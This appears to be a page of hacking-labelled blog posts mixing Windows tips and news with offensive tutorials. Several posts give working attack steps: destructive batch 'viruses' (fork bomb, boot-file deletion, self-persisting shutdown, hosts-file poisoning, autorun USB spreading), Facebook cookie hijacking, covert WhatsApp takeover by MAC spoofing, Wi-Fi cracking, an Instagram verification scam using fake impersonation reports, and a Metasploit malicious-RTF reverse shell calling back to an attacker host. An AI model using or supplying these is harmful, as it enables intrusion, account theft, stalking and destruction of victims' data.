Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Sunday, 11 August 2024

10 steps to use chris titus tool in windows

 Chris Titus Tech's tool, known as "Titus Tool," is a script designed to debloat, optimize, and manage Windows settings efficiently. Here’s a step-by-step guide on how to use it:


### **Step 1: Download the Script**

1. Open a web browser and visit Chris Titus Tech's GitHub repository for the tool.

2. Download the latest version of the script. The repository is usually found at [ChrisTitusTech/Win10Script](https://github.com/ChrisTitusTech/win10script).


### **Step 2: Extract the Script**

1. If the script is downloaded as a zip file, extract it to a folder on your computer.


### **Step 3: Open PowerShell**

1. Right-click on the **Start Menu** and select **Windows PowerShell (Admin)**. This opens PowerShell with administrative privileges, which is required to run the script.


### **Step 4: Set Execution Policy**

1. Run the command:

   ```powershell

   Set-ExecutionPolicy Unrestricted -Scope Process

   ```

   This allows the script to run on your system.


### **Step 5: Navigate to the Script Folder**

1. Use the `cd` command to navigate to the folder where you extracted the script. For example:

   ```powershell

   cd C:\Path\To\Script

   ```


### **Step 6: Run the Script**

1. To execute the script, type:

   ```powershell

   .\win10debloat.ps1

   ```

   The script will start running, and a menu will appear with various options.


### **Step 7: Choose Desired Options**

1. The script will present you with a menu of options such as "Debloat Windows 10," "Remove OneDrive," "Change Privacy Settings," and more.

2. Select the desired options by typing the corresponding number or letter.


### **Step 8: Follow On-Screen Prompts**

1. Some options may require further input or confirmation. Follow the on-screen prompts to complete each action.


### **Step 9: Restart Your Computer**

1. After the script completes, it’s recommended to restart your computer to apply all changes.


### **Step 10: Review Changes**

1. After the reboot, review your system to ensure that all desired changes have been applied. You may need to tweak additional settings manually if necessary.


By following these steps, you can effectively use Chris Titus Tech's tool to optimize your Windows system.

Monday, 1 January 2024

How to Make a Zip Bomb in Windows

 

  • Step-1: Open any text editor and type Space ('  ') and save the file as 'a.txt'

  • Step-2: Copy and paste spaces (' ') as many times as possible until the file is of significant size (2 to 3MB). Then save the file.

  • Step-3: Make 100+ copies of 'a.txt' in the same folder.

  • Step-4: Open command prompt in the same folder and enter the command below to combine all the text files into one and save it as 'b.txt'.copy /b *.txt b.txt

  • Step-5: Repeat steps 3 and 4 to create an even larger text file of 2 to 3 GB and save it as 'c.txt'.

  • Step-6: Compress the text file 'c.txt' using WinZipWinRAR or 7-Zip and save it as 'smallbomb.zip'.

  • Step-7: Make several copies of 'smallbomb.zip' then add them all into one final archive and save it as 'bomb.zip' and your Zip Bomb is ready.

Sunday, 3 November 2019

Save yourself $ for a Verified Badge Account on Instagram.

a person who make this really get himself a Verified Badge on Instagram. Not tried by myself yet. Somebody may find this useful.

Step 1.

Make your account look professional, non-spammy, quality looking and not something a 10-year-old put together. Your last 6 posts especially should be all good ones. No reposts, no selling or promoting Clay Davis, NO non-original content. If you use it to promote eCommerce put that on pause or scale it back to 1 ecom post for every 10 non-promotional posts.

Step 2.

Tweak your bio and 1 or 2 or your last 3 posts to be international. Internationally known or doing business globally. I don’t know why but this matters if you’re not famous. It took us several tries and we were approved on the last request after adding some stuff about offices and projects we’ve done in other countries. They won’t verify Birmingham’s Plumbing Service as that’s obviously local not global.

 

Step 3

Create 3 other copycat accounts from different IPs, browsers, and emails at different times. Each with their own bio and pics (even with pics stolen from your real account) Spread them each out a few days or week. Best to use a separate computer or phone, VPN if you don’t know what you’re doing. Clear cookies use a different phone etc. Never log into this from the same your real accounts IP or phone or wifi or same cookies etc. Make the names like your username official or something very close to your username.


Step 4.

Wait for 1 to 2 weeks then have a couple of friends report the account. Then you report the account as impersonating your account.

 

Step 5.

After the account is removed by IG. Apply to be verified. Boom you’re done! It usually takes about 5 days to hear back. If it’s a no then repeat the steps until it’s verified, you already created 2 more copycat accounts remember

It was our 3rd try when we got verified. We are a global brand though. We have 12k followers and only 75 posts but you can do it with just 2-5000. Check audit and be over 60% real followers on there. During this 90 day period, we were at 44% real by them but got it up to 77% real. This may have helped idk. It’s the combo of global, plus high-quality account, plus being impersonated. The people offering these services just know exactly what IG is looking for. My company didn’t so that’s why I say to get approved in 90 days, could even be just who the auditor you get is or what mood they’re in. Most likely they have an algorithm that if you meet the first steps it sends it for manual review. They definitely don’t manually review every request.

if anyone else got approved post up your journey or tips also and let’s make it easy for all to get verified. You can reapply every 30 days. If you change your username you lose the badge. Don’t focus too much time or money on this though, it did not make a big difference for us just something nice to have as it adds a little more credibility to your account and posts.

Goodluck.

Monday, 22 April 2019

HACK FACEBOOK BY COOKIE STEALING


Facebook Authentication Cookies
The cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of
your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain
access to your account. This is how a facebook authentication cookie looks like:
Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;
How To Steal Facebook Session Cookies And Hijack An Account?
An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon
the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet
sniffer and gain access to victims account.
If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication
cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order
to capture authentication cookie and gain access to victims account.
In the example below I will be explaining how an attacker can capture your authentication cookies and hack
your facebook account with wireshark.
Step 1 - First of all download wireshark from the official website and install it.
Step 2 - Next open up wireshark click on analyze and then click on interfaces.
Step 3 - Next choose the appropriate interface and click on start.
Step 4 - Continue sniffing for around 10 minutes.
Step 5 - After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.
Step 6 - Next set the filter to http.cookie contains “datr” at top left, This filter will search for all the
http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.
Step 7 - Next right click on it and goto Copy - Bytes - Printable Text only.
Step 8 - Next right click on it and goto Copy - Bytes - Printable Text only.
Step 9 - Next you’ll want to open up firefox. You’ll need both Greasemonkey and the cookieinjector script. Now
open up Facebook.com and make sure that you are not logged in.
Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.
Step 10 - Now refresh your page and viola you are logged in to the victims facebook account.
Note: This Attack will only work if victim is on a http:// connection and even on https:// if end to end
encryption is not enabled.

Saturday, 20 April 2019

Remotely Shutdown Android Phone

You can remotely shutdown Android by sending SMS with secret code or by calling it from a specific number.


This feature comes handy in many situations such as you forgot the phone at home and want no one to attend your calls.


You can do these by using the third party apps and these can be only done on Any Android device.


You can download the Application from the link below :-

https://drive.google.com/file/d/0B7cJlINA6cW-WXdlVEpqTW9qVDQ/view?usp=drivesdk

Monday, 15 April 2019

How to play Video in MX Player during call?

Open MX Player and tap on the 3-dotted  icon at the top right of the screen.


Select Settings and scroll down to find the Play alone option


By default, it is checked in the checkbox . Now tap on it and uncheck it. This will enable the MX Player to play the videos even when you are in a call


Friday, 18 January 2019

Batch Files -The Arts Of Creating Viruses

I could just you give the codes to paste  in notepad and  ask you to save files with extension .bat and   your deadly batch viruses would be ready. But instead of that, I have focused on making the basics of batch files clear and developing the approach to code your own viruses.

What are Batch Files ?
Lets begin with a simple example , Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x  //makes directory 'x' on desktop
2. cd x  // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'     

We first make a folder/directory 'x', then enter in folder  'x',then make a folder 'y' in folder 'x' . 
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in  notepad and save file as anything.bat                         

Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we ran the batch file  
So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run. 

What can batch viruses do ?

They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1.  Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x   //loop variable
start winword 
start mspaint  //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and of course affecting performance. 

2. Folder flooder
@echo off
:x
md %random% // makes directory/folder. 
goto x

Here %random% is a variable that would generate a positive no. randomly.  So this code would make start creating folders whose name can be any random number. 

3.User account flooder 
@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers. 

3.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”  
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”    //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00  //this will shutdown the computer in 0 seconds  

Note : Files in Start up folder gets started automatically when windows starts .  You should  first two lines of  code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder. 

4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply 

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows. 


 Lets make a batch file to 
delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr   // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr    //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again. 


5. Fork Bomb
%0|%0  //Its percentage zero pipe percentage zero
This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .

6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything                          


Every extension is associated with a filetype like extension ‘exe’ is  is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
 Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.


7.  DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts  file.

@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts   //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file. 

Replace xxx.xxx.xxx.xxx  and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he would try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.

Spreading batch viruses through pen drive -:

Step 1. 
Open notepad and write 
[autorun]
open=anything.bat
Icon=anything.ico
Save file as ‘autorun.inf’

Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

PC Error's with solution

1. MONITOR LED IS BLINKING
Check all the connections like Monitor Cable, Data cables, RAM, Display Card , CPU connections.

2. CONTINUOUS THREE BEEPS

Problem in RAM Connection.

3. THREE BEEPS ( 1 Long 2 Short)

Problem in Display Card Connection

4. THREE LONG BEEPS PERIOD WISE

Problem in BIOS or RAM (Basic Input Output System)

5. CONTINUOUS NON-STOP BEEPING

Key Board Problem (I.e.; Some Key is pressed for Longer time)

6. FDD LED IS GLOWING CONTINUOUSLY
Data cable to be connected properly (twisted cable).

7. NO DISPLAY ON THE SCREEN AT ALL

Hard Disk cable connected wrongly. Connect rightly seeing the Red mark (Faces power supply) and then Restart.

8. POWER LED IS OFF
a. Check main power cord
b. Check S.M.P.S.
c. Check Mother Board connection

9. SHOWING CMOS ERROR

Replace 3 Volt battery of Mother Board . Set Original Settings Manually.(Refer­ CMOS Setup chart) Enter your search terms.Submit search form.

10. SHOWING FDD ERROR OR FLOPPY DRIVE IS NOT WORKING PROPERLY

Check Power cord of FDD , Data Cables , set CMOS & Finally the Check drive.

11. SHOWING HDD ERROR OR HARD DISK FAILURE
a. Check Power Cord
b. Check connection of HDD
c. Check Data cable
d. Check Hard Disk parameters in CMOS or Auto detecting Setting Partitions by Fdisk Command, then format it to set track 0.

12. MOTHER BOARD HANGS DUE TO UNSTABILIZED POWER SUPPLY
a. Check S.M.P.S
b. RAM not functioning properly.
c. Software problem (due to using pirated software)
d. CPU fan not functioning properly.

13. DANCING SCREEN
a. Check Display card connection
b. Virus Problem
c. Video Memory Problem

14. SHAKING SCREEN

a. Earthing problem
b. Magnetic waves comes around.

15. CPU CABINET SHOCK

a. Check Earthing
b. Check main power cord.

16. NON-SYSTEM DISK ERROR
a. Floppy Drive having different disk (Non-Bootable Disk) OR CMOS Parameters for Hard Disk may not be set properly.
b. Hard Disk Partitions may not be created.
c. Hard Disk may not be formatted.

17. MISSING OPERATING SYSTEM
The System files missing namely Ie; command.com} -User File IO.SYS & MS_DOS.SYS } - Hidden Files. These above three files required for Start up of the system that can be transferred by using SYS C: Command OR While the time of formatting by using Format c:/u/s

18. MISSING COMMAND INTERPRETOR

May the file Command.com is corrupted OR Infected by Virus OR Some one has Erased it.

19. SHOWING I/O ERROR
a. The type of Hard Disk in CMOS may not be set properly.
b. Operating system used for formatting is not valid.

20. SHOWING DIVIDE OVER- FLOW MESSAGE
a. May some Directories or Files crash with other files.
b. Use CHKDSK/F or SCANDISK Command to correct it.

21. HARD DISK MAKING NOISE WHILE PROCESSING
a. Unstabilized power supply.
b. Check for Loose Contact.
c. Do not use Y Connectors for Hard Disk.
d. It may create Bad Sector OR Weak Hard Disk.

22. HARD DISK HANGS WHILE PROCESSING
Check for Bad Sector by using CHKDSK or SCANDISK Command. If found format the Hard Disk and set Partition before that area.(This is the only procedure to use Hard Disk with Bad Sector) OR (To avoid Bad Sectors use Standard Power Supply)

23. HARD DISK NOT DETECTED

a. Check Power Connector
b. Check Data Cables
c. Check Jumpers

24. PARTITION NOT SHOWN

Operating System where the Hard Disk formatted is not supported with present Mother Board. For Eg: Hard Disk formatted with Pentium System will hide their partitions for 486 System.

25. MMX/DLL FILE MISSING
May the above files may be corrupted due to power failure or Virus. Make available above files from other Computer. OR Reinstall Windows 98 Operating System. (This procedure will not make any effect on existing Data).

26. WINDOWS REGISTRY ERROR
This will happen due to sudden ON/OFF of the system. Final solution is to Reinstall Operating System.

27. DISPLAY COLOUR DOES NOT MATCH

a. Configure Display Card properly with their CD.
b. The Standard setting for Windows is set it to 800x600 for better performance.

28. UNKNOWN DEVICE FOUND

May the Driver utility is not provided with operating system . Insert Driver CD and install software for the above Device...

How VPN Work (Virtual Private Network Part II)

   What you may not know is that VPN is now available at the best VPN providers for most Android devices. Not just your mobile phone or tablet but your laptop too; essentially any piece of tech you carry around with you can access mobile VPN – but what’s it for? Surely a mobile device can make use of mobile data or Wi-Fi hotspots for network access?
Well yes they can but if you’re going out of your way to be secure on your home network, why allow your guard down when you step out of the house? Can you afford for your phone or laptop to be hacked via a Wi-FI hotspot? There has been a rise in criminals hacking ‘free Wi-Fi’ in 2015; Will your business maintain its reputation if all the customers’ details are freely accessible thanks to poor network security on the move?
The answer to these questions is almost certainly no and a big tick in a big box for Mobile VPN but the case in favour doesn’t end there.

Read whatsapp Conversation

Its hard to hide when everyone want to know your privacy ! Welcome to digital world.
Ok so today well talk about decryption of whatsapp database and read a conversation..
So here's a few steps you need to follow
1. Root the phone (Using Kingoroot)
2.Download and install ES Explorer
3.Download Whatscrypt /Omni-Crypt
4.Download Whatsapp viewer
Steps
1 . Root your phone using Kingoroot, if the root success it will auto install su (Super user)  in your phone and access the root of the phone.
2 : open EsExplorer click the three small line on your left  then navigate and enble root explorer.
3. Ok now open Whatscrypt and su will ask permission so click allow
4. Done? Easy right now on whatscrypt clcik fetch crypts keys (work only on rooted devices)  after fetching the keys now click on decrypt  whatsapp database.
5. Select database  path, enter your email id ,  enter the key. Then click on decrypt ...
6. After decrypt navigate the path of decrypted database file .. Copy it to your computer.
7. after copy it to PC,  open whatsappviewer then choose the path of the files which u just copy (decrypt database file) and thats it your done...read your conversation easily..
**This is for Educational Purpose Only**

Wednesday, 15 November 2017

Hack wireless Network using AIRCRACK-NG

    Find out the name of your wireless adapter.

  1. First there are basically the following things that you need to know
  2. lo - loopback. Not important currently.
  3. eth - ethernet
  4. wlan - This is what we want. Note the suffix associated.
  5. Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter
    *Enable Monitor mode
  6. Now, we use a tool called airmon-ng to create a virtual interface called mon.
  7. Just type airmon-ng start wlan0 Your monitoring interface will be created - mon0 in case of Kali 1.x, wlan0mon in all other cases.
  8. *Start capturing packets
  9. Now, we'll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You'll see the name of the wifi you want to hack. For kali 2.0 or rolling, replace mon0 with wlan0mon airodump-ng mon0
  10. *Store the captured packets in a file
  11. This can be achieved by giving some more parameters with the airodump command. For Kali 2.0 or rolling, replace mon0 with wlan0mon. *airodump-ng mon0 --write name_of_file
  12. Now the captured packets will be stored in name_of_file.cap You will have to wait till you have enough data (10000 minimum)
  13. Crack the wifi Now, you can use aircrack-ng to crack the password. 
  14. (in a new terminal) aircrack-ng name_of_file-01.cap The program will ask which wifi to crack, if there are multiple available.
  15. Choose the wifi. It'll do its job. If the password is weak enough, then you'll get it in front of you.
  16. If not, the program will tell you to get more packets. The program will retry again when there are 15000 packets, and so on.
  17. You'll get the key, probably in this format- xx:xx:xx:xx:xx Remove the colons xxxxxxxxxx is the password of the wireless network

**This is for educational Purpose only**

Friday, 20 October 2017

Whatsapp Hack via MAC Spoofing

Everyone want to access other conversation especially boyfriend want to spy on Girlfriend conversation via whatsapp & Vice versa .
So here's  three simple method to access other whatsapp conversations.
{For Beginners}

1. MAC address Spoofing (Level : Hard)

[But this need physical access of the Victim devices]

Ok here how it goes

MAC Address Spoofing

1. Whatsapp Uninstall
Firstly go to play store, search Whatsapp messenger and uninstall Whatsapp from your device. Make sure you that your Whatsapp account will completely uninstall from your android device.

2 . Get victim’s phone
Get the victim’s android phone which you want to access. You need the victim;s phone for few mints for the hacking process.

3. Find MAC (Media Acess Control) address from the victim’s phone
We don’t know which OS platform is victim use. So below we give you all smartphone platform, with these you will easily find MAC Address from victim;s phone.
Android : Go to the setting > About phone > wifi MAC address
Iphone : Go to Setting > General > About > MAC Address.
Window Phone : Go to Setting > About > More Info > MAC address
Blackberry : Option > Go to Device >Device and Status Info > WLAN MAC

4 . Save Victim’s MAC address
After finding a MAC address, you have to save MAC address on the paper or where you want. Make sure you save right MAC address.

5. Find MAC Address of your own device
Get your mac address of your smartphone and save it for future when you want to access your own Whatsapp account.

6. Spoofing your mac address
Now you need to spoofing your Mac address.

7. Install Terminal Emulator . After installed  you have to change your MAC address with victim phone’s MAC address. By typing  $su and now hit Enter.

8. Now again type the below and then hit Enter. This will show you mac address for your confirmation.

                                               $busybox iplink show eth0
9. Now again, type the following command,
                                 $ busybox ifconfig eth0 hw ether XX:XX:XX:XX:XX:XX

10. Replace, XX:XX:XX:XX:XX:XX  with you friend/victim’s Android mac address which noted down in first step.
11. Now, you have successfully changed your Android device mac address. Now, you can confirm this by typing the following command,
                                                  $ busybox iplink show eth0

8. Re-install Whatsapp Messenger on your device
After Spoofing MAC address and Installing Whatsapp Messenger on your device, you can easily access victim’s Whatsapp account just follow a few more steps.

Open Whatsapp messenger and enter victim’s mobile number.
Now take victim’s phone for few second because after entered victim’s number, you have to get Whatsapp confirmation code from victim’s phone.
After getting code fill it into Whatsapp on your phone and delete confirmation message from victim's phone.

Monday, 16 October 2017

Side jacking

This type of attack is used to gaining access into the victim’s website session  such as email service and Facebook.Usally websites encrypted passwords when the user puts it in and sends an unencrypted session ID. This ID or the saved cookies are used by the hacker to gain access to your websites session. A plug-in that was introduced by Fire fox in 2010 called the Fire Sheep can be used to side-jacks a Wi-Fi connections are encrypted, someone nearby could easily hijack your session while you’re busy sipping coffee and browsing at the local cafe. Although SideJacking has been prevalent since 2007, the plug-in was introduced by  Eric Butler. This revelation prompted much debate and discussion in Security circles and amongst bloggers. A new plug-ins was then introduced called BlackSheep, which is intended to inform the user about someone using FireSheep around them. It just makes one realize how careful one needs to be when using an unsecured public Wi-Fi at a coffee shop. Don’t think that this is restricted to laptops only; even if you are using a public Wi-Fi through your iPad  or smartphone,you are equally vulnerable to the threat. This is because even in this case, a browser will be used, and the vulnerabilities lie in almost all known browsers.

Saturday, 7 October 2017

Delete files without movin it to Recycle Bin

Whenever a file is deleted , it moves into recycle bin.But not from the hard disk.So to remove any file from hard disk directly without moving it to Recycle Bin just follow these Simple steps:
>>Press Window button+R 
>>then- type gpedit.msc to open group policy editor
>>In group policy editor , expand User Configuration>Administrative Templates>Windows Components and select Windows Explorer

>>On right window pane you can see Setting : Do not move deleted files to recycle bin
>>Double Click it and select Enabled and click Ok
>>That's it now you can delete files in your hard disk without moving it in Recycle Bin


Alternate:You can also delete files from hard disk without placing it in hard disk by selecting file and pressing Shift + Delete keys at a time

Wednesday, 3 May 2017

Disable USB Ports

With this trick, you can disable access to your USB(Universal Serial Bus) ports on your Windows based PC to prevent people from taking out data without permission or spreading viruses through the use of USB (pen and flash) drives.
->To use this trick to disable USB ports, follow the steps given below:-
1.Click on Start.
2.Click on Run. If you cannot find RUN, type it in the search box.
3.Type "regedit" without quotes. This will launch the Registry Editor.
4.Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbstor.
5.In the work area, double click on Start.
6.In the Value Data box, enter 4.
7.Click on OK.
8.Close Registry Editor and refresh your desktop.
9.To re-enable access to your USB ports, enter 3 in the Value Data box in Step 6.

Thursday, 9 March 2017

Your Anti virus? Here what CIA think of it!

The hackers are quoted taking potshots at anti-virus firms, suggesting the American intelligence agencies are keenly aware of flaws in the products meant to be keeping us all safe online.

The data published by WikiLeaks isn't systematic enough to draw firm conclusions about the reliability of one product or another and the uncertain dating means the CIA's critiques provide more of a snapshot than an overview.

Still, the posts show America's top cyberspies aren't always flattering about commonly used security software.

___

COMODO

The CIA appears to give mixed praise to the anti-virus solution by Comodo, the self-described "global leader in cyber security solutions."

One post by an apparent CIA hacker published by WikiLeaks said Comodo is "a colossal pain in the posterior. It literally catches everything until you tell it not to."

Just don't upgrade to Comodo 6.

That version "doesn't catch nearly as much stuff," the hacker appears to say, describing a particularly glaring vulnerability as a "Gaping Hole of DOOM."

Melih Abdulhayoglu, Comodo's chief executive, emphasized the first part of the post, saying that being called a pain by the CIA was "a badge of honor we will wear proudly." In a statement, he said that the vulnerability described by the CIA was obsolete. Comodo 6 was released in 2013; Comodo 10 was released in January.

___

KASPERSKY LAB

This is one of the world's leading providers of security protection. But it may not keep you safe from the CIA.

A flaw in the code "enables us to bypass Kaspersky's protections," according to another post .

Founder Eugene Kaspersky dismissed the comment, saying in a Twitter message that the flaw identified in the CIA leak was fixed "years ago."

A statement from his company said a second flaw apparently identified by the agency was fixed in December 2015.

___

AVIRA

A CIA hacker appears to say that this German-engineered anti-virus product is "typically easy to evade."

The firm said in a statement that it had fixed what it described as "a minor vulnerability" within a few hours of the WikiLeaks release.

It added that it had no evidence that any of its users had been affected by the bug.

___

AVG

The CIA apparently had a trick to defeat AVG that was "totally sweet."

Ondrej Vlcek, the chief technology officer for AVG's owner, Netherlands-based Avast, said that the CIA appeared to be discussing a "theoretical bypass" of AVG's scanning engine which would have required additional work to successfully deploy as malicious software.

"We would not consider it critical," he said of the issue. Speaking via email, he added that it seemed the post was written "some time" ago.

"This is in fact not an issue today given the current operation of the AVG products," he said.

___

F-SECURE

One CIA hacker appeared to be particularly scathing about this Finnish firm's security software. It's a "lower tier product that causes us minimal difficulty," one apparent hacker said .

F-Secure noted that the company was described elsewhere , along with Avira, as an "annoying troublemaker." It said there was a broader point to be made about the CIA's apparent decision not to warn anti-virus companies about the flaws in their products.

The agency "considered it more important to keep everybody unsecure ... and maybe use the vulnerability for its own purposes or counter terrorism purposes," F-Secure's chief research officer Mikko Hypponen said in a statement.

___

BITDEFENDER

The posts aren't complete enough to say for sure, but Bitdefender, a Romanian anti-virus product, seemed to cause CIA hackers a lot of trouble.

One post appears to suggest that Bitdefender could be defeated by a bit of tinkering.

Or maybe not.

"Alas, we've just tried this," a response to the post said. "Bitdefender is still mad."

Bitdefender representative Marius Buterchi said the only conclusion to draw was that "we are detecting the CIA tools."

Friday, 10 February 2017

Remotely Hack A PC using Kali Linux & Metasploit

We will create a .rtf file and you need to send it to target. when your target will open this file in his/her Computer you will have a meterpreter session and You can do anything you want with the target system. that’s how you can hack a computer from your computer.
so that is the easiest way Most hackers can use to hack computers from another computer.
As usual we will start from Kali linux. You need to fire up Kali Linux. if You wana be an elite ethical hacker then here is a collection of some useful articles.
Let start the tutorial on how to hack a computer remotely.

Open Kali Linux and start msf console

You need to open Metasploit. You can fire up metasploit easily by going to
applications>Kali Linux>metasploit framework
How to hack a Computer Remotely ( Metasploit Tutorial )

Choose Exploit to hack a computer over internet

now its time to initialize your exploit. run this command in metasploit
use exploit/windows/fileformat/ms14_017_rtf

how to hack a computer-use exploit
if you want a detailed information about this exploit then you can find by just typing info
Now check what options we have or what we need to fill up.Just type in your console show options . and there will be a list of lots of options you can set with this exploit

Decide the FILENAME

You can decide the filename as you want. It depends on your target. here i am choosing filename as doc . so you need to type “set FILENAME doc.rtf “
how to hack a computer-set filename

Set the Payload

And finally as usual a payload can be set by using following command for the doc.rtf file . this payload will help us to start a meterpreter session to hack remote computers over internet.
set PAYLOAD windows/meterpreter/reverse_tcp
how to hack a computer-set payload

Set the LHOST

Next you need to set the LHOST . This is the ip which will be called when .rtf file will be executed. You can find your ip address by typing ipconfig in CMD and iwconfig in Kali Terminal . Type following command to set LHOST
set LHOST 192.168.1.112

How to hack a Computer Remotely ( Metasploit Tutorial )now type 
exploit

How to hack a Computer Remotely ( Metasploit Tutorial )

Open a Multi-Handler for the Connection

to accept the connection back to your system you need to set up Multi Handler. type this command
use exploit/multi/handler

How to hack a Computer Remotely ( Metasploit Tutorial )now set payload
 set PAYLOAD windows/meterpreter/reverse_tcp

How to hack a Computer Remotely ( Metasploit Tutorial )now set LHOST
 set LHOST 192.168.1.112

How to hack a Computer Remotely ( Metasploit Tutorial )AND execute finally
 exploit
that’s it . Now you need to send the .rtf file to your target, when someone will click on .rtf file, a meterpreter session will be started on your computer. Now you have almost full access to target system. You need to brush up your meterpreter commands.